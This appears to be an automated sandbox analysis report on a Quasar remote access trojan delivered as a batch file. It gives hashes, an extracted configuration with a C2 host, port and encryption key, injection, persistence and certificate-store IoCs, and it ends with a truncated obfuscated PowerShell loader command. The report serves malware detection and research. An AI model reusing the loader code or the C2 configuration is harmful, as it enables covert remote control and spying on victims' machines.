quasar | fcedeca6396c7c129f169f635085b84a0af4ab5d1043affe837c96640642230a

General

Target

R0X-Built.bat
Size

326KB
MD5

d967ead2d930328fe784be4e199cca49
SHA1

cfe200ede38b0c10638d181d64ce202c58b01ba1
SHA256

fcedeca6396c7c129f169f635085b84a0af4ab5d1043affe837c96640642230a
SHA512

b63459d12140f400539b7233cf8854df6f2805f9f09a902df6fe20649b8af27be408ae667b4101444ce5b1848e4b37383a309c4962e55709c2fe11410a47ee71
SSDEEP

6144:bx2lEdv93qPAK5WiwSRae50rX3cvmZi8pSOeAxqDpWStZ9qnR:b1dYPmmH5Tm88pnecqDp3AR

Score

10^/10

quasar slave execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-3vDee7FzoJnhqjuE3n

Attributes

encryption_key
KaNwItdY6wlv5nCN4prL
install_name
$srr-powershell.exe
log_directory
Logs
reconnect_delay
1000
startup_key
$srr-powershell
subdirectory
Windows

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral3/memory/4004-23-0x0000000007B60000-0x0000000007BCC000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 2880 created 636 2880 powershell.EXE winlogon.exe
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exe

flow pid process

2 4004 powershell.exe
3 4004 powershell.exe
4 4004 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

$srr-powershell.exeinstall.exe

pid process

1676 $srr-powershell.exe
4740 install.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

1 raw.githubusercontent.com
4 raw.githubusercontent.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com

description	pid	process	target process
PID 2880 created 636	2880	powershell.EXE	winlogon.exe

flow	pid	process
2	4004	powershell.exe
3	4004	powershell.exe
4	4004	powershell.exe

pid	process
1676	$srr-powershell.exe
4740	install.exe

flow	ioc
1	raw.githubusercontent.com
4	raw.githubusercontent.com

flow	ioc
1	ip-api.com

Drops file in System32 directory 6 IoCs

Processes:

svchost.exepowershell.EXEOfficeClickToRun.exe

description	ioc	process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 2880 set thread context of 3104 2880 powershell.EXE dllhost.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

4004 powershell.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

4532 schtasks.exe

description	pid	process	target process
PID 2880 set thread context of 3104	2880	powershell.EXE	dllhost.exe

pid	process
4532	schtasks.exe

Modifies data under HKEY_USERS 57 IoCs

Processes:

powershell.EXEOfficeClickToRun.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Thu, 02 May 2024 20:57:59 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1714683478"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={B3B1006E-94DD-4816-8047-6E0F3C500FA4}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

$srr-powershell.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	$srr-powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	$srr-powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	$srr-powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exe$srr-powershell.exepowershell.EXEdllhost.exe

pid	process
4004	powershell.exe
4004	powershell.exe
1676	$srr-powershell.exe
1676	$srr-powershell.exe
2880	powershell.EXE
2880	powershell.EXE
2880	powershell.EXE
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe
3104	dllhost.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

Processes:

powershell.exe$srr-powershell.exepowershell.EXEdllhost.exedwm.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	4004	powershell.exe
Token: SeDebugPrivilege	1676	$srr-powershell.exe
Token: SeDebugPrivilege	2880	powershell.EXE
Token: SeDebugPrivilege	2880	powershell.EXE
Token: SeDebugPrivilege	3104	dllhost.exe
Token: SeShutdownPrivilege	464	dwm.exe
Token: SeCreatePagefilePrivilege	464	dwm.exe
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE
Token: SeShutdownPrivilege	464	dwm.exe
Token: SeCreatePagefilePrivilege	464	dwm.exe
Token: SeShutdownPrivilege	3344	Explorer.EXE
Token: SeCreatePagefilePrivilege	3344	Explorer.EXE

Suspicious use of UnmapMainImage 2 IoCs

Processes:

RuntimeBroker.exeExplorer.EXE

pid process

3844 RuntimeBroker.exe
3344 Explorer.EXE

pid	process
3844	RuntimeBroker.exe
3344	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.exepowershell.EXEdllhost.exe

description	pid	process	target process
PID 1072 wrote to memory of 4004	1072	cmd.exe	powershell.exe
PID 1072 wrote to memory of 4004	1072	cmd.exe	powershell.exe
PID 1072 wrote to memory of 4004	1072	cmd.exe	powershell.exe
PID 4004 wrote to memory of 4532	4004	powershell.exe	schtasks.exe
PID 4004 wrote to memory of 4532	4004	powershell.exe	schtasks.exe
PID 4004 wrote to memory of 4532	4004	powershell.exe	schtasks.exe
PID 4004 wrote to memory of 1676	4004	powershell.exe	$srr-powershell.exe
PID 4004 wrote to memory of 1676	4004	powershell.exe	$srr-powershell.exe
PID 4004 wrote to memory of 1676	4004	powershell.exe	$srr-powershell.exe
PID 4004 wrote to memory of 4740	4004	powershell.exe	install.exe
PID 4004 wrote to memory of 4740	4004	powershell.exe	install.exe
PID 4004 wrote to memory of 4740	4004	powershell.exe	install.exe
PID 2880 wrote to memory of 3104	2880	powershell.EXE	dllhost.exe
PID 2880 wrote to memory of 3104	2880	powershell.EXE	dllhost.exe
PID 2880 wrote to memory of 3104	2880	powershell.EXE	dllhost.exe
PID 2880 wrote to memory of 3104	2880	powershell.EXE	dllhost.exe
PID 2880 wrote to memory of 3104	2880	powershell.EXE	dllhost.exe
PID 2880 wrote to memory of 3104	2880	powershell.EXE	dllhost.exe
PID 2880 wrote to memory of 3104	2880	powershell.EXE	dllhost.exe
PID 2880 wrote to memory of 3104	2880	powershell.EXE	dllhost.exe
PID 3104 wrote to memory of 636	3104	dllhost.exe	winlogon.exe
PID 3104 wrote to memory of 692	3104	dllhost.exe	lsass.exe
PID 3104 wrote to memory of 988	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 464	3104	dllhost.exe	dwm.exe
PID 3104 wrote to memory of 760	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 452	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 1052	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 1108	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 1188	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 1196	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 1204	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 1316	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 1412	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 1444	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 1528	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 1620	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 1632	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 1640	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 1752	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 1772	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 1832	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 1920	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 1984	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 1992	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 1228	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 1792	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 2140	3104	dllhost.exe	spoolsv.exe
PID 3104 wrote to memory of 2268	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 2360	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 2380	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 2440	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 2492	3104	dllhost.exe	sysmon.exe
PID 3104 wrote to memory of 2536	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 2544	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 2552	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 2560	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 2768	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 1060	3104	dllhost.exe	sihost.exe
PID 3104 wrote to memory of 684	3104	dllhost.exe	unsecapp.exe
PID 3104 wrote to memory of 1344	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 3344	3104	dllhost.exe	Explorer.EXE
PID 3104 wrote to memory of 3480	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 3500	3104	dllhost.exe	svchost.exe
PID 3104 wrote to memory of 3844	3104	dllhost.exe	RuntimeBroker.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:636

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:464

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{962babb9-fca9-4ea0-ba76-21bbdb3eba64}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3104

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:760

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:452

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1188

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:SaKyHMEZbXiX{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$drcXQtlxKKbwAx,[Parameter(Position=1)][Type]$vbbxyTXchR)$tfUciSfIPRm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+'l'+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+'el'+[Char](101)+''+'g'+''+'a'+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+'o'+'d'+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+'l'+''+[Char](105)+'c'+','+''+[Char](83)+''+'e'+''+[Char](97)+''+[Char](108)+''+'e'+'d'+[Char](44)+''+'A'+''+'n'+''+[Char](115)+''+'i'+''+[Char](67)+'l'+'a'+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+'ut'+[Char](111)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$tfUciSfIPRm.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+'m'+[Char](101)+''+','+'Hid'+'e'+'By'+[Char](83)+''+'i'+''+[Char](103)+''+','+''+'P'+'u'+'b'+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$drcXQtlxKKbwAx).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+'m'+''+'e'+''+','+'M'+[Char](97)+'n'+'a'+''+[Char](103)+''+'e'+'d');$tfUciSf